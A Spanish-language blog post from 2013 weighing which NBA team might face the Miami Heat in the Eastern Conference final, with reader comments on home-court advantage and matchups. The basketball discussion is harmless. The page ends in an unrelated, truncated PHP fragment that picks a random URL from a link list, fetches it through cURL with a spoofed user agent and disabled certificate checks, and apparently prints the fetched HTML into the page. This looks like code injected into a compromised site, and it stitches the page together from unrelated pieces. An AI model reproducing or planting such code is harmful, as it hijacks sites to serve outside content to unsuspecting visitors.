Se busca finalista del Este

27 de February de 2013 por Esteban

Llegando al final de la temporada regular de la NBA, la conferencia Este está prácticamente resuelta. Solo una drástica caída de los Bucks y un salto aún mas grande de calidad de los Raptors podrían modificar los ocho clasificados a Playoffs. Por otro lado también está más que decantado que el vencedor de la conferencia serán los campeones vigentes, los Miami Heat, y, visto lo visto, da toda la sensación de que arrollarán a quien se ponga en su camino hasta la final de conferencia.

Por ello hay que comenzar a pensar quienes serán los beneficiados por el don de dios que esquiven a los campeones hasta esa hipotética final de conferencia.

En primer lugar ya podemos ir descartando a los Milwaukee Bucks como finalistas ya que se cruzaran con un tal Lebron James en primera ronda lo que prácticamente les asegura ser eliminados y posiblemente barridos.

Una vez eliminados los Bucks, lo interesante del caso es que los puestos que abarcan del 2 al 7 de la conferencia han mostrado una paridad increíble y que puede pasar, nunca mejor dicho, cualquier cosa.

Veamos las chances de estos 6 equipos:

Hoy el séptimo puesto lo ocupan los Celtics, a quienes dimos por muertos con la lesion de Rajon Rondo. Si bien no pudieron mantener la racha lograda los primeros partidos sin él, hace dos días vencieron a un duro Utah Jazz, mostrando la principal arma con la que contarán en PO, es decir Paul Pierce. En “The True” reposan todas las ilusiones del equipo en dar otro batacazo (éxito inesperado) en Playoffs.  El amor propio de Kevin Garnett, una dura defensa y la “magia” que puede sacar a relucir Doc Rivers, completan el conjunto de fundamentos a los que pueden aferrarse. Hoy chocarían con los Pacers, que ya no son los jóvenes inexpertos de otros años y que serán, sin duda, un hueso duro de roer. ¿Una buena? De acabar así la conferencia y de vencer a los Pacers, no se verían con los Heat hasta final de conferencia

El sexto  lugar pertenece  a los Chicago Bulls que extrañamente ocuparon el tercer puesto durante buena parte del curso. Sus chances de dar el cimbronazo van de la mano del regreso de Derrick Rose y de como regrese. Chicago tiene el mejor roster de apoyo para una mega estrella de lejos en cuanto a rotación, defensa y jugadores de rol. Solo falta la mega estrella… Si Rose regresa a un nivel cercano a lo que le recordamos, sumado a la excelente defensa de los Bulls, más las grandes temporadas de Boozer, Noah y Deng, este equipo está en serias condiciones de vencer al actual tercer clasifiaco, los New York Knicks. Es solo especulación ya que a día de hoy y sin Rose, estarían fritos. No sin pelear claro pero a 7 juegos los Knicks creo que los vencerían. ¿Una buena? De seguir en carrera y derrotar a los Knicks, no se cruzarían con los Heat sino hasta final de conferencia.

El quinto puesto se enfrentaría a los Heat de superar la primera ronda y hoy ese puesto lo ocupan los tristemente célebres Brooklyn Nets. No es que su año sea tan malo solo que no han estado a la altura de las expectativas generadas, y una eliminación en semifinal de conferencia (y por los visto en sus enfrentamientos con el Heat, por paliza) sería una pésima forma de terminar el año. Más allá de eso, aún tienen chances de escalar hasta el tercer puesto aunque los separan 4 juegos de los Knicks. Simplemente parece difícil.  Les doy que vencerán a los Hawks pero de ninguna manera a los Heat. Sus virtudes, un Lopez que puede hacerse sentir frente a Miami, un cerrador de juegos como pocos en la figura de Joe Johnson y el potencial que podrían alcanzar (hoy muy lejano) tanto Wallace como Williams.

En el cuarto puesto encontramos a los Atlanta Hawks. Tienen una grandiosa dupla interior, un eléctrico base y buenos tiradores de perímetro que abren espacio a Hordfod y Smith. Esto no los hace maravillosos pero han logrado mantenerse en puesto de playoffs durante toda la temporada en un año claramente de reconstrucción lo que tiene un doble mérito. En una serie a 7 juegos con los Nets son candidatos a quedar afuera ya que las variantes de los Nets son demasiadas en comparación a las pocas armas con las que cuenta Atlanta (lease Hordfod y Smith). Su posición es realmente mala ya que de vencer a los Nets jugarían semifinal de conferencia con el propio Miami, lo que los dejaría virtualmente fuera de esta discusión.

Llegamos a los dos máximos candidatos. En el tercer puesto aparecen los New York Knicks. Lejos de su arranque perfecto han deambulado entre lo muy bueno, lo bueno y lo malo pero se han mantenido en el tope de la categoría y su record es genial. Serían cabeza de pisión lo que les daría la localía frente a los Pacers en una hipotética semifinal. Sus armas se saben de memoria: un killer de sangre fría como Melo, la velocidad y explosión de Felton y la defensa y ánimo de Chandler son sus principales virtudes. Además cuentan con la experiencia invaluable de Kidd, Wallace, Thomas, Prigioni, Camby y ahora también Martin que les da un aire de equipo que sabrá lo que tiene q hacer en playoffs. Pero su máximo valor,  a mi entender, surge de la banca, en primer lugar con J.R. Smith atravesando al mejor temporada de su carrera. En un serie a 7 juegos, es capaz de garantizar  3 o 4 juegos fantásticos y 3 o 4 juegos malos, pero en fin, es un arma letal saliendo de la banca y pocos equipos cuentan con un jugador que pueda cambiar la dinámica del juego como Smith. El otro valor es un cada día más mejorado Stoudemire, muy criticado sin haber jugado siquiera ya que supuestamente volvía para romper la química del equipo. Lo que pasó fue todo lo contrario: Amare ha aceptado su rol de sexto hombre y en New York se encuentran con otro jugador capaz de irse hasta los 20 puntos en un juego saliendo desde la banca. Está cada día mas rápido y el pick and roll con Anthony puede volverse indefendible. Tiene las limitaciones de siempre pero saliendo de la banca su floja defensa es menos notoria y su falta de rebotes lo mismo. En definitiva, un lujo. Con Amare y Smith los Knicks tienen dos suplentes que pueden garantizarte entre ambos 30 puntos por noche mientras que la banca entera de los Pacers podrían garantizar ¿cuantos? ¿5 o 6 puntos? ¿Y la de los Heat? Ni Ray Allen ha podido mejorar esa banca. Punto para los Knicks.

Y por último, el candidato del autor de estas líneas y quizá de la mayoría después de ver la paliza que le han dado a los mismísimos Knicks no hace mucho, los Indiana Pacers. El regreso de Granger, una racha de 4 partidos ganados consecutivamente, un Paul George con más de 20 puntos de promedio en febrero, una dupla interior tan buena en defensa como en ataque, etc.  los convierte no solo en candidatos a llegar a la final de conferencia, sinó que hasta podría pensarse que una vez allí podrían derrotar a Miami, como ya han hecho en los dos choques de este año. Tienen carencias como la falta de un cerrador de juegos aunque George cada vez arma su tiro más rápido y podría convertirse en uno en un futuro, o también la falta de respuestas ofensivas de la banca, cuestión que viene a solucionar Granger y que de momento cumple el rookie Orlando Johnson. El año pasado David West ya abusó malamente de Battier en el poste lo que podría obligar a los Heat a cambiar su esquema, más aún si Hibbert puede hacerse sentir como ya lo hizo el año pasado. Los duelos entre Lebron y George y Wade y Stephenson serán gloriosos, la mejor dupla perimetral ofensiva de la liga frente a la mejor dupla perimetral defensiva de la liga. Pero antes de eso tendrán el clásico noventero con los Knicks, donde si los Pacers pueden defender a su nivel, no hay forma que los NYK puedan derrotarlos. Simplemente no tienen la fluidez ofensiva necesaria como para salir de la telaraña Pacer. viven del triple y los los de Vogel lo defienden hermosamente bien y son muy rápidos en contragolpe contra las viejas y cansadas piernas de los Knicks.

La mesa está servida. Elija usted quien acompañará a los Miami Heat en la final de la conferencia Este.

Comenta

21 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Veo super estúpido eso de que los Knicks tengan ventaja de campo frente a los Pacers. Vamos, que podría darse el caso de que un equipo que ha ganado 10-15 partidos más que otro, vea perdido el factor campo porque no ha ganado su división… que absurdo.

    Por otra parte, creo que serán los Pacers quienes lleguen a final de conferencia.

      Citar

  2. Esteban dice:
    #2

    Comparto jose luis, pero esa regla ha sido asi desde q tengo memoria, q se le va a hacer

      Citar

  3. Denise dice:
    #3

    Para mi el factor cancha es la mayor mentira del baloncesto al igual que la mayor mentira del futbol es que el que juega la vuelta en casa tiene ventaja.
    Cuando un equipo es bueno, gana donde haga falta.

      Citar

  4. Simon dice:
    #4

    Si no me equivoco desde hace 6 o 7 años, el campeón de división solo tiene asegurado un puesto entre los 4 primeros de la conferencia pero ya no tiene asegurada la ventaja de campo. Así que en caso de enfrentamiento Pacers- Knicks en semifinal de conferencia la ventaja de campo sería para Pacers.

      Citar

  5. Simon dice:
    #5

    Denise:
    Para mi el factor cancha es la mayor mentira del baloncesto al igual que la mayor mentira del futbol es que el que juega la vuelta en casa tiene ventaja.
    Cuando un equipo es bueno, gana donde haga falta.

    Claaaro y por eso vemos tan a menudo eliminatorias en las que los equipos solo ganan en su casa… y se la llevan. Supongo que no habrás jugado a ningun deporte a niveles medios/altos pues ahí uno sabe lo que cuesta ganar a domicilio a equipos que en tu casa te los follas fácil.

      Citar

  6. Simon dice:
    #6

    Simon:
    Si no me equivoco desde hace 6 o 7 años, el campeón de división solo tiene asegurado un puesto entre los 4 primeros de la conferencia pero ya no tiene asegurada la ventaja de campo. Así que en caso de enfrentamiento Pacers- Knicks en semifinal de conferencia la ventaja de campo sería para Pacers.

    Confirmado, fue desde el 2007 y además esa temporada ya tenemos el primer precedente. Chicago tuvo mejor record que Miami pero al ser campeón de división el Heat, lograron el 4 puesto pero la ventaja de campo fue para los Bulls.

    En 2008 tenemos la primera ronda con Jazz campeón de división pero Rockets con ventaja de campo. 0

    El año pasado sin ir mas lejos Boston fue 4 pero la ventaja de campo fue para los Hawks que en términos de clasificación fueron 5.

      Citar

  7. Esteban dice:
    #7

    De de erratas

    Ahora q lo pienso bioen, si pacers y nyk estan dentro de los primeros cuatro, el q mas victorias tiene sera el q tenga ventaja de campo

      Citar

  8. melo15 dice:
    #8

    Pero Pacers tambien es campeon de division no?
    Yo no creo que los Pacers sean claros favoritos contra los Knicks, es mas creo que es al reves.
    De los Pacers no hay nadie que cierre los partidos y Stephenson estara verde en PO y George como lider absoluto tambien. Ademas que dudo que Hibbert pueda con Chandler la verdad.
    Como has dicho Esteban la segunda unidad de Pacers es un 0 a la izquierda y la de los Knicks una de las mejores de la liga.
    Y eso de que los Knicks viven del triple para mi es mentira. Los Knicks viven de su movimiento de balon y de las dobles marcas que atrae Melo, y es por eso que encuentran espacio en la linea de 3 porque se crean superioridades y a eso le sumas la buena circulacion pues te da puntos faciles.
    El mayor defecto de los Knicks es que Melo y J.R aveces quieren hacer la guerra por su cuenta y entonces los Knicks juegan a simplres Isolations pra Melo y Smith.

      Citar

  9. Esteban dice:
    #9

    bueno es la idea debatir a ver a quien prefiere cada uno

    los pacers no son tan inexpertos como crees melo, george jugara su tercer PO como titular, y el año pasado no solo paso primera ronda sino que le robaron dos juegos al HEAT, alli tambien estaba hill que acumnula juegos en PO en los spurs, west y hibbert, ya no son los chiquillos que se enfrentaron a los bulls hace tres años

    el problema de la banca de los pacers deberia en principio solucionarse cuando GRANGER recupere su nivel, al dia de hoy es un lastre pero tendra tiempo para ser un arma confiable desde la banca

    los knicks obvio que no viven del triple, viven q melo y lo que el genera, sucede que cuando el genera espacio, depende de los tirados y de que esten en su noche

    olvidamos los cavs de lebron? eran lebron y si el no anotaba era dar el pase para el triple de Mo, West, parker o jamison, que paso cuando estos no encestaron esos triples? bueno estos knicks son muy similares a aquellos cavs

    si george logra frenar medianamente el juego de melo sion ayudas, los kicnks no tienen tirados que no sean a pie firme, lease kidd, felton, shumpert y por otra parte tampoco tienen soluciones con chandler en ofensiva

    por eso les di el punto en j.r. y amare, que pueden ser los dos hombres que rompan con el esquema ofensivo rigido de los knicks

      Citar

  10. Denise dice:
    #10

    Simon: Claaaro y por eso vemos tan a menudo eliminatorias en las que los equipos solo ganan en su casa… y se la llevan. Supongo que no habrás jugado a ningun deporte a niveles medios/altos pues ahí uno sabe lo que cuesta ganar a domicilio a equipos que en tu casa te los follas fácil.

    Ennnn???? No tengo tanto tiempo como para ponerme a buscar estadisticas, pero eliminatorias de Playoffs que acaben 4-3 con cada equipo ganando partidos en su casa, deben de representar menos del 1% !!. Normalmente…el que parte con el factor cancha suele llevarse la eliminatoria, no por el factor cancha, sino porque en teoría es mejor equipo que el otro, para algo quedó en temporada regular a 82 partidos por delante de él…pero casi todas las eliminatorias acaban con el ganador ganando fuera y en otras muuuuchas ocasiones tanto ganador y perdedor ganan fuera.

    Y el factor cancha en mi opinión, es todavía menos importante en Playoffs ya que los equipos juegan cada 3 ó 4 dias y vienen descansaditos. En temporada regular si tiene mas importancia ya que tu puedes jugar en tu casa y vienes descansadito y te enfrentas a un equipo que se ha pegado la paliza de 2.000 kms de viaje en avión o está en medio de una gira.

    Si quieres lo comprobamos en los proximos Playoffs!!

    Los amateurs y los jugadores de barrio entiendo que puedan sentirse presionados de jugar fuera, pero si un tio con 30 años, pelos en los huevos y curtido en 1000 batallas se va a asustar de 15.000 abucheando (que ni eso, ya que en la NBA no hay radicales como en Europa) apaga y vamonos….

      Citar

  11. Javijaen dice:
    #11

    Bueno, obviamente siendo de los Knicks apuesto por ellos, con un 25,3 %. Pero vamos por partes:
    – Tanto Chicago, Indiana y Boston tienen un 24,9 % para ocupar ese puesto, ya que las eliminatorias Pacers-Celtics y Knicks-Bulls, en caso de producirse, se las traen.
    – Curiosamente, las “Marías” del Este, para mí, son los Hawks y los Nets, aparte de los Bucks, por supuesto.
    – Un aporte: actualmente, la serie Knicks-Bulls está en un 0-3, y la serie Pacers-Celtics en un 0-1 (ganado por 19 puntos), por lo que, aparte de la ventaja de campo, no veo claridad en cuanto a su posición en la regular.
    – Sería una sorpresa desmedida que alguien se cargara a los Heat en su conferencia, al menos desde mi punto de vista.
    Ahí lo dejo…

      Citar

  12. HisRoyalAirness dice:
    #12

    Bueno, partiendo de la base que la conferencia Este me parece lamentable y que si pusiéramos a los Heat en la Oeste sudarían sangre para meterse en la final (a ver cómo defienden en una serie a Duncan, Nowitzki, Griffin, Marc & Z-Bo e incluso Pau-Howard).

    A los Heat sólo se les puede ganar por dentro y la EC es un solar.

    Los únicos que podrían sacar algo son los Knicks por profundidad de plantilla y veteranía. No cuento a los Pacers porque necesitarían un gran nivel contínuo de Hibbert y parece que al tipo no le apetece

      Citar

  13. rumbero dice:
    #13

    Denise: Ennnn???? No tengo tanto tiempo como para ponerme a buscar estadisticas, pero eliminatorias de Playoffs que acaben 4-3 con cada equipo ganando partidos en su casa, deben de representar menos del 1% !!. Normalmente…el que parte con el factor cancha suele llevarse la eliminatoria, no por el factor cancha, sino porque en teoría es mejor equipo que el otro, para algo quedó en temporada regulara 82 partidos por delante de él…pero casi todas las eliminatorias acaban con el ganador ganando fuera y en otras muuuuchas ocasiones tanto ganador y perdedor ganan fuera.

    Y el factor cancha en mi opinión, es todavíamenos importante en Playoffs ya que los equipos juegan cada 3 ó 4 dias y vienen descansaditos. En temporada regular si tiene mas importancia ya que tu puedes jugar en tu casa y vienes descansadito y te enfrentas a un equipo que se ha pegado la paliza de 2.000 kms de viaje en avión o está en medio de una gira.

    Si quieres lo comprobamos en los proximos Playoffs!!

    Los amateurs y los jugadores de barrio entiendo que puedan sentirse presionados de jugar fuera, pero si un tio con 30 años, pelos en los huevos y curtido en 1000 batallas se va a asustar de 15.000 abucheando (que ni eso, ya que en la NBA no hay radicales como en Europa) apaga y vamonos….

    A mi me parece que el factor cancha es determinante muhísimas veces. Obviamente que esto se lo acaba llevando el mejor y para eso hay que ganar fuera pero no es tan simple. Esta temporada por ejemplo un equipo como los Nuggets el acabar 4º le puede suponer empezar en su casa contra Memphis donde está siendo un coco y plantarse con un 2-0 que no es lo mismo que empezar con un 0-2. Mejor poder 4 en casa siempre.

    Muy difícil. Como dice Javijaen va a depender mucho de los cruces porque depende de el que toque se puede complicar más o menos el asunto. Aunque por juego diría Pacers nose porque me da que los Knicks pueden volver a su mejor versión en PO. Veremos. Eso si, tengo curiosidad por ver hasta donde llega el Green Pride aunque todos les demos por muertos en 1a ronda contra Indiana

      Citar

  14. melo15 dice:
    #14

    Ablamos como si los Pacers ya se hubieran apropiado de la segunda plaza, aunque yo prefiero verme las caras con unos Bulls con un Rose recien llegado que con los Celtics.

      Citar

  15. Ruxixón dice:
    #15

    Habría que tener en cuenta la forma de caer eliminado en un hipotético cruce con Miami pero para mí no sería un desastre que los Nets palmaran en semifinales con un 4-2.Evidentemente hay mucho salario comprometido pero no se puede pasar de la nada a lo más alto en una temporada y si te elimina este equipo pues oye.Otra cosa sería que fueran barridos por ellos o que no pasaran de la primera ronda,entonces si sería catalogable como fracaso.Además creo que este primer año en Brooklyn ha juntado sensaciones muy extrañas para ellas y aún así está consolidados en PO,recordemos los cambios de entrenador,Deron que está tocado de los tobillos,etc.

    A mí me encantaría una final de conferencia con Knicks de por medio,creo que Melo se merece la oportunidad de estar ahí y librarse como LeBron en su día de ciertas etiquetas.Evidentemente salvando las distancias.A priori Indiana parece favorito para acompañar a los Heat en la final pero dependiendo de la primera serie se puede acumular un desgaste inútil que a la hora de la verdad puede pesar.

    Chicago,a pesar de su gran rendimiento este año,en PO necesitará de Rose y no creo que éste se apresure a la hora de volver.Siente mucha pasión por este juego pero también es muy maduro como para tomar una decisión precipitada.Además creo que los Bulls están en su máximo de defensa toda la temporada y otros equipos se van aplicar más en ese sentido.

      Citar

  16. Esteban dice:
    #16

    los BULLS no solo necesitaran de ROSE, necesitaran del mejor ROSE para vencer a los Knicks y luego a los Pacers y asi llegar a final de conferencia

      Citar

  17. Jose Luis dice:
    #17

    Creo que con un Rose a medio gas pueden cepillarse a los Knicks fácil

      Citar

  18. HisRoyalAirness dice:
    #18

    Jose Luis:
    Creo que con un Rose a medio gas pueden cepillarse a los Knicks fácil

    Ni de coña. Tienen para defenderle a Kidd (que está viejo pero se las sabe todas), Felton e incluso Prigioni para hacerle 5 faltas seguidas.

    El resto de ambas plantillas me parece bastante igualado, al margen de que Carmelito es 100 millones de veces mejor que Deng

      Citar

  19. Chipi dice:
    #19

    La burrada de la temporada. 54 puntitos de Curry. Animalico…

      Citar

  20. Jose Luis dice:
    #20

    Lo digo más por el factor psicológico que por las faltas. Además, que fácilmente te saca un 2+1, y a las 5 faltas bonus y tiros libres.

      Citar

  21. Simon dice:
    #21

    Yo tambien veo a los Bulls con un Rose a nivel medio tirando a bueno pulirse a los Knicks… Para emparejarse con Carmelo tienen dos buenos defensores como Deng y Jimmy Butler que ya ha hecho este año grandes actuaciones ante estrellas rivales y no es pequeño si no que mide 2.01…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>